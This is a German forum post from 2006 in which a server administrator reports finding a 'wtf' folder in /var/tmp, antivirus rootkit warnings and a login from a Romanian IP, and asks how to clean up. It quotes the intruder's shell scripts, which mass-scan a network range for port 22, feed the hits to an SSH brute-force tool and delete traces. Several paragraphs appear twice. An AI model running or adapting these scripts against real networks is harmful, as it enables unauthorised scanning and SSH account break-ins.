Hacktool Rootkit WTF
Posted: 2006-09-16 13:07
Ich habe im var Verzeichniss in tmp einen Ordner wtf entdeckt.
In diesem Ordner sind irgendwelche Datein.
z.B. eine go.sh
in der das drin steht
auch ne wtf Datei in der das drin steht.
beim runterkopieren des tmp Inhaltes auf meine Festplatte ist Norton Antivirus angeschlagen mit dem Hinweis Hacktool detectet!
Auch wurde die Meldung Rootkit Hacktool angezeigt.
Ein Verzeichniss wtf ist auf dem Server nicht zu finden außer in var/tmp. Außerdem wurde ein Zugriff einer Ip aus Rumänien über den Account einer unserer Warserver gelogt.
Weil ich diesen Warserver neustarten wollte mit Putty sind mir Befehle wie cd wtf oder ./wtf 85.61 aufgefallen, beim scrollen!
Bekomm ich den Mist wieder runter? Reicht das löschen des Verzeichnisses in var/tmp. Natürlich habe ich die Passwörter geändert.
In diesem Ordner sind irgendwelche Datein.
z.B. eine go.sh
in der das drin steht
Code: Select all
./ss 22 -b $1 -i eth0 -s 6
cat bios.txt |sort | uniq > mfu.txt
./ssh-scan 50
rm -f bios.txtCode: Select all
#!/bin/bash
if [ $# != 1 ]; then
echo " usage: $0 <b class>"
exit;
fi
echo "* REMEMBER * This is NOT a FREE SCANNER. Behave!"
echo "# Kill the WABBIT."
./pscan2 $1 22
sleep 10
cat $1.pscan.22 |sort |uniq > mfu.txt
oopsnr2=`grep -c . mfu.txt`
echo "# I FOUND $oopsnr2 SERVERS"
echo "----------------------------------------"
echo "..."
./ssh-scan 100
rm -rf $1.pscan.22 mfu.txt
echo "WTF? Where is the WABBIT?"Auch wurde die Meldung Rootkit Hacktool angezeigt.
Ein Verzeichniss wtf ist auf dem Server nicht zu finden außer in var/tmp. Außerdem wurde ein Zugriff einer Ip aus Rumänien über den Account einer unserer Warserver gelogt.
Weil ich diesen Warserver neustarten wollte mit Putty sind mir Befehle wie cd wtf oder ./wtf 85.61 aufgefallen, beim scrollen!
Bekomm ich den Mist wieder runter? Reicht das löschen des Verzeichnisses in var/tmp. Natürlich habe ich die Passwörter geändert.